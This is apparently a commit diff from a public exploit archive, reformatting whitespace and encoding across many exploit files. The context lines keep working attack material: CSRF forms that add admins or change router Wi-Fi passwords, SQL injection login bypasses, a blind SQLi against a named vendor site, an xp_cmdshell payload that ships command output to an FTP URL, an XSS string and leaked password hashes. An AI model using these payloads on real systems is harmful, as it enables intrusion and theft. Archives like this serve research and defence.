DB: 2021-08-20
204 changes to exploits/shellcodes Charity Management System CMS 1.0 - Multiple Vulnerabilities
This commit is contained in:
parent
6f730aa235
commit
4e7ab00187
205 changed files with 1446 additions and 1318 deletions
|
@ -43,7 +43,7 @@ function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detectio
|
||||||
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
|
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
|
||||||
|
|
||||||
// dans tous les cas :
|
// dans tous les cas :
|
||||||
echo "<p class='normal'><a class='erreur'> ";
|
echo "<p class='normal'><a class='erreur'> ";
|
||||||
$msg = "";
|
$msg = "";
|
||||||
|
|
||||||
// test du nom
|
// test du nom
|
||||||
|
|
|
@ -54,8 +54,8 @@ Add/Edit Admin CSRF:
|
||||||
<td><input type='checkbox' name='uload' value='1'>Upload</td> <td><input type='checkbox' name='rename' value='1'>Rename</td>
|
<td><input type='checkbox' name='uload' value='1'>Upload</td> <td><input type='checkbox' name='rename' value='1'>Rename</td>
|
||||||
<td><input type='checkbox' name='delete' value='1'>Delete</td> <td><input type='checkbox' name='edit' value='1'>Edit</td>
|
<td><input type='checkbox' name='delete' value='1'>Delete</td> <td><input type='checkbox' name='edit' value='1'>Edit</td>
|
||||||
<td><input type='checkbox' name='dload' value='1'>Download</td> <td><input type='checkbox' name='chmod' value='1'>Chmod</td>
|
<td><input type='checkbox' name='dload' value='1'>Download</td> <td><input type='checkbox' name='chmod' value='1'>Chmod</td>
|
||||||
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
|
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
|
||||||
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
|
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
|
||||||
</form>
|
</form>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|
|
@ -69,12 +69,12 @@ http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connecto
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
<td>
|
<td>
|
||||||
</td>
|
</td>
|
||||||
<td>
|
<td>
|
||||||
Current Folder<br />
|
Current Folder<br />
|
||||||
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
|
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
|
||||||
<td>
|
<td>
|
||||||
</td>
|
</td>
|
||||||
|
|
||||||
<td>
|
<td>
|
||||||
Resource Type<br />
|
Resource Type<br />
|
||||||
|
@ -96,16 +96,16 @@ Resource Type<br />
|
||||||
<td valign="top">
|
<td valign="top">
|
||||||
<a href="#" onclick="GetFolders();">Get Folders</a></td>
|
<a href="#" onclick="GetFolders();">Get Folders</a></td>
|
||||||
<td>
|
<td>
|
||||||
</td>
|
</td>
|
||||||
<td valign="top">
|
<td valign="top">
|
||||||
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
|
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
|
||||||
<td>
|
<td>
|
||||||
</td>
|
</td>
|
||||||
|
|
||||||
<td valign="top">
|
<td valign="top">
|
||||||
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
|
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
|
||||||
<td>
|
<td>
|
||||||
</td>
|
</td>
|
||||||
<td valign="top">
|
<td valign="top">
|
||||||
<form id="frmUpload" action="" target="eRunningFrame" method="post"
|
<form id="frmUpload" action="" target="eRunningFrame" method="post"
|
||||||
enctype="multipart/form-data">
|
enctype="multipart/form-data">
|
||||||
|
|
|
@ -11,7 +11,7 @@ Arbitrary File Upload
|
||||||
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
|
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
|
||||||
<p align="center">
|
<p align="center">
|
||||||
<input type=file name=uploadfile size=100><br> <br>
|
<input type=file name=uploadfile size=100><br> <br>
|
||||||
<input type=submit value=Upload> </p>
|
<input type=submit value=Upload> </p>
|
||||||
</form>
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -75,8 +75,8 @@ DEMO : TO change the admin login details and other info..
|
||||||
<input type=text name=Adminlevel value="Root">
|
<input type=text name=Adminlevel value="Root">
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
<td width="168"> </td>
|
<td width="168"> </td>
|
||||||
<td width="220"> </td>
|
<td width="220"> </td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td colspan="2">
|
<td colspan="2">
|
||||||
|
|
|
@ -22,8 +22,8 @@ Sex
|
||||||
</select>
|
</select>
|
||||||
</p>
|
</p>
|
||||||
<p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
|
<p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
|
||||||
<p> </p>
|
<p> </p>
|
||||||
<p> </p>
|
<p> </p>
|
||||||
|
|
||||||
</form>
|
</form>
|
||||||
</frewal>
|
</frewal>
|
||||||
|
|
|
@ -7,7 +7,7 @@
|
||||||
# Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
|
# Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
|
||||||
# Demo:
|
# Demo:
|
||||||
http://site.com/Examples/PowUpload/Simpleupload.htm
|
http://site.com/Examples/PowUpload/Simpleupload.htm
|
||||||
|
|
||||||
[Comment]
|
[Comment]
|
||||||
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
|
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
|
||||||
Login-Root, KikoArg, Ricota,
|
Login-Root, KikoArg, Ricota,
|
||||||
|
|
|
@ -6,7 +6,7 @@
|
||||||
# Software: EAFlashUpload v 2.5
|
# Software: EAFlashUpload v 2.5
|
||||||
# Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
|
# Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
|
||||||
# Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
|
# Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
|
||||||
|
|
||||||
[Comment]
|
[Comment]
|
||||||
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
|
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
|
||||||
Login-Root, KikoArg, Ricota,
|
Login-Root, KikoArg, Ricota,
|
||||||
|
|
|
@ -194,16 +194,16 @@ MSSQL CMD Injection Exploit(For DBO Users) :
|
||||||
<tr>
|
<tr>
|
||||||
<center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>
|
<center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>
|
||||||
<center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td>
|
<center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td>
|
||||||
<td> </td>
|
<td> </td>
|
||||||
<td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c:\ > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td>
|
<td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c:\ > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>
|
<td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>
|
||||||
<td> </td>
|
<td> </td>
|
||||||
<td>
|
<td>
|
||||||
<select name="">
|
<select name="">
|
||||||
<option value="0">(CMD)</option>
|
<option value="0">(CMD)</option>
|
||||||
</select> <br><br>
|
</select> <br><br>
|
||||||
<input type="submit" value="Apply"></center>
|
<input type="submit" value="Apply"></center>
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
[~] ----------------------------بسم الله الرØÂمنالرØÂيم------------------------------
|
[~] ----------------------------بسم الله الرØÂمنالرØÂيم------------------------------
|
||||||
 [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
|
 [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
|
||||||
 Â
|
 Â
|
||||||
 [~]Vendor: www.activewebsoftwares.com
|
 [~]Vendor: www.activewebsoftwares.com
|
||||||
|
@ -30,7 +30,7 @@
|
||||||
Â
|
Â
|
||||||
 [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
|
 [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
|
||||||
 [~]
|
 [~]
|
||||||
 [~] spechial thanks : dolly & 7am3m & عماد ,الزهيرÙÅ
|
 [~] spechial thanks : dolly & 7am3m & عماد ,الزهيرÙÅ
|
||||||
 [~]
|
 [~]
|
||||||
 [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
|
 [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
|
||||||
 [~]
|
 [~]
|
||||||
|
|
|
@ -4,25 +4,25 @@
|
||||||
|
|
||||||
[~] Vendor: www.adserversolutions.com
|
[~] Vendor: www.adserversolutions.com
|
||||||
|
|
||||||
[☠] Software: Affiliate Software Java 4.0
|
[☠] Software: Affiliate Software Java 4.0
|
||||||
|
|
||||||
[☠] author: ((Ñ3d D3v!L))
|
[☠] author: ((Ñ3d D3v!L))
|
||||||
|
|
||||||
[☠] Date: 12.12.2008
|
[☠] Date: 12.12.2008
|
||||||
|
|
||||||
[☠] Home: www.ahacker.biz
|
[☠] Home: www.ahacker.biz
|
||||||
|
|
||||||
[☠] contact: N/A
|
[☠] contact: N/A
|
||||||
|
|
||||||
[☠] ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
|
[☠] ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
|
||||||
|
|
||||||
[☠] Exploit:
|
[☠] Exploit:
|
||||||
|
|
||||||
☠username: r0' or ' 1=1--
|
☠username: r0' or ' 1=1--
|
||||||
☠password: r0' or ' 1=1--
|
☠password: r0' or ' 1=1--
|
||||||
|
|
||||||
|
|
||||||
[☠]login 4 d3m0:
|
[☠]login 4 d3m0:
|
||||||
|
|
||||||
http://www.adserversolutions.com/affiliate_java/logon.jsp
|
http://www.adserversolutions.com/affiliate_java/logon.jsp
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@
|
||||||
|
|
||||||
[~] contact: N/A
|
[~] contact: N/A
|
||||||
|
|
||||||
[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
|
[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
|
||||||
|
|
||||||
[~] Exploit:
|
[~] Exploit:
|
||||||
|
|
||||||
|
@ -22,7 +22,7 @@
|
||||||
[~] password: r0' or ' 1=1--
|
[~] password: r0' or ' 1=1--
|
||||||
|
|
||||||
|
|
||||||
[☠] login 4 d3m0:
|
[☠] login 4 d3m0:
|
||||||
|
|
||||||
www.adserversolutions.com/admgmt_460/logon.jsp
|
www.adserversolutions.com/admgmt_460/logon.jsp
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@
|
||||||
|
|
||||||
[~] contact: N/A
|
[~] contact: N/A
|
||||||
|
|
||||||
[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
|
[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
|
||||||
|
|
||||||
[~] Exploit:
|
[~] Exploit:
|
||||||
|
|
||||||
|
@ -22,7 +22,7 @@
|
||||||
[~] password: r0' or ' 1=1--
|
[~] password: r0' or ' 1=1--
|
||||||
|
|
||||||
|
|
||||||
[☠]login 4 d3m0:
|
[☠]login 4 d3m0:
|
||||||
|
|
||||||
www.adservingsolutions.com/xchange_java/logon_license.jsp
|
www.adservingsolutions.com/xchange_java/logon_license.jsp
|
||||||
|
|
||||||
|
|
|
@ -1,42 +1,42 @@
|
||||||
[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرØمن الرØيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
|
[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرØمن الرØيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
|
||||||
[☠]
|
[☠]
|
||||||
[~] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability
|
[~] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability
|
||||||
[☠]
|
[☠]
|
||||||
[~] Vendor: www.hotwebscripts.co.uk
|
[~] Vendor: www.hotwebscripts.co.uk
|
||||||
[☠]
|
[☠]
|
||||||
[☠] Software: HotWeb Rentals
|
[☠] Software: HotWeb Rentals
|
||||||
[☠]
|
[☠]
|
||||||
[☠] author: ((Ñ3d D3v!L))
|
[☠] author: ((Ñ3d D3v!L))
|
||||||
[☠]
|
[☠]
|
||||||
[☠] Date: 15.2.2009
|
[☠] Date: 15.2.2009
|
||||||
[☠]
|
[☠]
|
||||||
[☠] Home: CL053D
|
[☠] Home: CL053D
|
||||||
[☠]
|
[☠]
|
||||||
[☠] contact: X@hotmail.co.jp
|
[☠] contact: X@hotmail.co.jp
|
||||||
[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
|
[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
|
||||||
|
|
||||||
[☠] ERR0R CONSOLE
|
[☠] ERR0R CONSOLE
|
||||||
|
|
||||||
WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)
|
WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)
|
||||||
|
|
||||||
[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L
|
[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L
|
||||||
|
|
||||||
[☠] Exploit:
|
[☠] Exploit:
|
||||||
|
|
||||||
[☠] TRU3 : details.asp?PropId=1+and+1=1
|
[☠] TRU3 : details.asp?PropId=1+and+1=1
|
||||||
|
|
||||||
|
|
||||||
[☠] FALS3 : details.asp?PropId=1+and+1=2
|
[☠] FALS3 : details.asp?PropId=1+and+1=2
|
||||||
|
|
||||||
[☠]liv3 3xpL0!T:
|
[☠]liv3 3xpL0!T:
|
||||||
[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
|
[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
|
||||||
[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
|
[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
|
||||||
|
|
||||||
|
|
||||||
[☠]
|
[☠]
|
||||||
|
|
||||||
N073:
|
N073:
|
||||||
R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
|
R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
|
||||||
|
|
||||||
4R48!4N-HACK3R!!القراصنه العرب
|
4R48!4N-HACK3R!!القراصنه العرب
|
||||||
|
|
||||||
|
@ -46,9 +46,9 @@ R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
|
||||||
[~]70 ÙALL ARAB!AN HACKER 3X3PT:LAM3RZ
|
[~]70 ÙALL ARAB!AN HACKER 3X3PT:LAM3RZ
|
||||||
[~] spechial thanks : ((dolly)) & ((7am3m)) &MAGOUSH ;) & EMAD & 0R45h3Y
|
[~] spechial thanks : ((dolly)) & ((7am3m)) &MAGOUSH ;) & EMAD & 0R45h3Y
|
||||||
|
|
||||||
[☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''
|
[☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''
|
||||||
|
|
||||||
[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007
|
[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007
|
||||||
|
|
||||||
[~]spechial FR!ND: 74M3M تميم
|
[~]spechial FR!ND: 74M3M تميم
|
||||||
|
|
||||||
|
|
|
@ -36,7 +36,7 @@ def main():
|
||||||
</head>
|
</head>
|
||||||
<body onLoad="triggerCrash()">
|
<body onLoad="triggerCrash()">
|
||||||
<div id="evilDiv">
|
<div id="evilDiv">
|
||||||
|
|
||||||
</div>
|
</div>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|
|
@ -14,7 +14,7 @@ The Vigor 3900 is a high-performance quad-Gigabit WAN router for high-performanc
|
||||||
failover. Its WAN throughput runs at up to 1Gb/s, adequate for the most demanding SME applications. The WAN ports on the Vigor 3900 can provide load balancing
|
failover. Its WAN throughput runs at up to 1Gb/s, adequate for the most demanding SME applications. The WAN ports on the Vigor 3900 can provide load balancing
|
||||||
or WAN failover. Based on a new DrayTek OS platform, the Vigor 3900 combines high performance and capacity with DrayTek's traditional ease of use and comprehensive
|
or WAN failover. Based on a new DrayTek OS platform, the Vigor 3900 combines high performance and capacity with DrayTek's traditional ease of use and comprehensive
|
||||||
features set.
|
features set.
|
||||||
########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management
|
########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management
|
||||||
providing access to WAN resources only to the appropriate users or departments, as well as maintaining infrastructure effciency.
|
providing access to WAN resources only to the appropriate users or departments, as well as maintaining infrastructure effciency.
|
||||||
|
|
||||||
############################Advisory:###################################################
|
############################Advisory:###################################################
|
||||||
|
|
|
@ -26,8 +26,8 @@ Exploit:
|
||||||
<tbody><tr><td class="headerbg">Factory Reset</td></tr>
|
<tbody><tr><td class="headerbg">Factory Reset</td></tr>
|
||||||
</tbody></table>
|
</tbody></table>
|
||||||
<table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
|
<table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
|
||||||
<tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr>
|
<tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr>
|
||||||
</tbody></table><br>
|
</tbody></table><br>
|
||||||
<input name="Factory" value=" Yes " type="submit" width="60">
|
<input name="Factory" value=" Yes " type="submit" width="60">
|
||||||
</form>
|
</form>
|
||||||
|
|
||||||
|
@ -41,7 +41,7 @@ Exploit:
|
||||||
</tbody></table>
|
</tbody></table>
|
||||||
<table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
|
<table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
|
||||||
<tbody><tr>
|
<tbody><tr>
|
||||||
<td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td>
|
<td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td>
|
||||||
<td bgcolor="#F0F0F0" valign="top">
|
<td bgcolor="#F0F0F0" valign="top">
|
||||||
<table border="0">
|
<table border="0">
|
||||||
<tbody><tr><td>
|
<tbody><tr><td>
|
||||||
|
@ -49,15 +49,15 @@ Exploit:
|
||||||
<table border="0" cellpadding="3" cellspacing="0">
|
<table border="0" cellpadding="3" cellspacing="0">
|
||||||
<tbody><tr>
|
<tbody><tr>
|
||||||
<td width="20"></td><td>IP Address</td>
|
<td width="20"></td><td>IP Address</td>
|
||||||
<td>: <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td>
|
<td>: <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td></td><td>Subnet Mask</td>
|
<td></td><td>Subnet Mask</td>
|
||||||
<td>: <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td>
|
<td>: <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td></td><td>Default Gateway</td>
|
<td></td><td>Default Gateway</td>
|
||||||
<td>: <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td>
|
<td>: <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td>
|
||||||
</tr>
|
</tr>
|
||||||
</tbody></table>
|
</tbody></table>
|
||||||
</td></tr>
|
</td></tr>
|
||||||
|
@ -68,8 +68,8 @@ Exploit:
|
||||||
</tbody></table>
|
</tbody></table>
|
||||||
<table border="0" cellpadding="5" cellspacing="1" width="100%">
|
<table border="0" cellpadding="5" cellspacing="1" width="100%">
|
||||||
<tbody><tr>
|
<tbody><tr>
|
||||||
<td height="50" width="149"> </td>
|
<td height="50" width="149"> </td>
|
||||||
<td width="355"> <input name="Config2" value=" Save " type="submit" width="80"> <input value="Cancel" type="reset" width="80"></td>
|
<td width="355"> <input name="Config2" value=" Save " type="submit" width="80"> <input value="Cancel" type="reset" width="80"></td>
|
||||||
</tr>
|
</tr>
|
||||||
</tbody></table>
|
</tbody></table>
|
||||||
</form>
|
</form>
|
|
@ -2,11 +2,11 @@
|
||||||
# Date: 20-04-2014
|
# Date: 20-04-2014
|
||||||
# Author: Rakesh S
|
# Author: Rakesh S
|
||||||
# Software Link: http://www.teracom.in/
|
# Software Link: http://www.teracom.in/
|
||||||
# Version: T2-B-Gawv1.4U10Y-BI
|
# Version: T2-B-Gawv1.4U10Y-BI
|
||||||
|
|
||||||
The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage to change SSID and its password.
|
The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage to change SSID and its password.
|
||||||
|
|
||||||
The exploitation example below changes password for the SSID:
|
The exploitation example below changes password for the SSID:
|
||||||
|
|
||||||
|
|
||||||
<a href="http://[HOST]/webconfig/wlan/country.html/country?context=&wlanprofile=MIXED_G_WIFI&wlanstatus=on&country=INI&txpower=1&wlanmultitouni=on&TxRate=Automatic&chanselect=automatic&channel=8&essid=SSID&hidessid=off&security=wpa2&encryptionselect=tkip&authmethodselect=psk&wpapp=ChangePassword&pmkcaching=on&confirm=Confirm" target="myIframe">Submit</a>
|
<a href="http://[HOST]/webconfig/wlan/country.html/country?context=&wlanprofile=MIXED_G_WIFI&wlanstatus=on&country=INI&txpower=1&wlanmultitouni=on&TxRate=Automatic&chanselect=automatic&channel=8&essid=SSID&hidessid=off&security=wpa2&encryptionselect=tkip&authmethodselect=psk&wpapp=ChangePassword&pmkcaching=on&confirm=Confirm" target="myIframe">Submit</a>
|
|
@ -1,6 +1,6 @@
|
||||||
# Exploit Title: DIGISOL DG-BR4000NG - Cross-Site Scripting
|
# Exploit Title: DIGISOL DG-BR4000NG - Cross-Site Scripting
|
||||||
# Date: 2018-06-24
|
# Date: 2018-06-24
|
||||||
# Vendor Homepage: http://www.digisol.com
|
# Vendor Homepage: http://www.digisol.com
|
||||||
# Hardware Link: https://www.amazon.in/Digisol-DG-BR4000NG-Wireless-Broadband-802-11n/dp/B00A19EHYK
|
# Hardware Link: https://www.amazon.in/Digisol-DG-BR4000NG-Wireless-Broadband-802-11n/dp/B00A19EHYK
|
||||||
# Category: Hardware
|
# Category: Hardware
|
||||||
# Exploit Author: Adipta Basu
|
# Exploit Author: Adipta Basu
|
||||||
|
@ -8,9 +8,9 @@
|
||||||
# Web: https://hackings8n.blogspot.com
|
# Web: https://hackings8n.blogspot.com
|
||||||
# Tested on: Mac OS High Sierra
|
# Tested on: Mac OS High Sierra
|
||||||
# CVE: CVE-2018-12705
|
# CVE: CVE-2018-12705
|
||||||
|
|
||||||
# Reproduction Steps:
|
# Reproduction Steps:
|
||||||
|
|
||||||
- Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
|
- Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
|
||||||
- Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
|
- Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
|
||||||
- Open BurpSuite
|
- Open BurpSuite
|
||||||
|
|
|
@ -1,17 +1,17 @@
|
||||||
# Exploit Title: DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting
|
# Exploit Title: DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting
|
||||||
# Date: 2018-06-25
|
# Date: 2018-06-25
|
||||||
# Vendor Homepage: http://www.digisol.com
|
# Vendor Homepage: http://www.digisol.com
|
||||||
# Hardware Link: https://www.amazon.in/Digisol-DG-HR3400-300Mbps-Wireless-Broadband/dp/B00IL8DR6W
|
# Hardware Link: https://www.amazon.in/Digisol-DG-HR3400-300Mbps-Wireless-Broadband/dp/B00IL8DR6W
|
||||||
# Category: Hardware
|
# Category: Hardware
|
||||||
# Exploit Author: Adipta Basu
|
# Exploit Author: Adipta Basu
|
||||||
# Tested on: Mac OS High Sierra
|
# Tested on: Mac OS High Sierra
|
||||||
# CVE: N/A
|
# CVE: N/A
|
||||||
|
|
||||||
# Reproduction Steps:
|
# Reproduction Steps:
|
||||||
|
|
||||||
- Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
|
- Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
|
||||||
- Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
|
- Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
|
||||||
- Open BurpSuite
|
- Open BurpSuite
|
||||||
- Change the SSID to "Testing" and hit "Apply"
|
- Change the SSID to "Testing" and hit "Apply"
|
||||||
- Burp will capture the intercepts.
|
- Burp will capture the intercepts.
|
||||||
- Now change the SSID to <script>alert("ADIPTA")</script> and keep APSSID as it is
|
- Now change the SSID to <script>alert("ADIPTA")</script> and keep APSSID as it is
|
||||||
|
|
|
@ -104,7 +104,7 @@ testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.
|
||||||
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
|
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
|
||||||
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
|
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
|
||||||
roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0" />
|
roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0" />
|
||||||
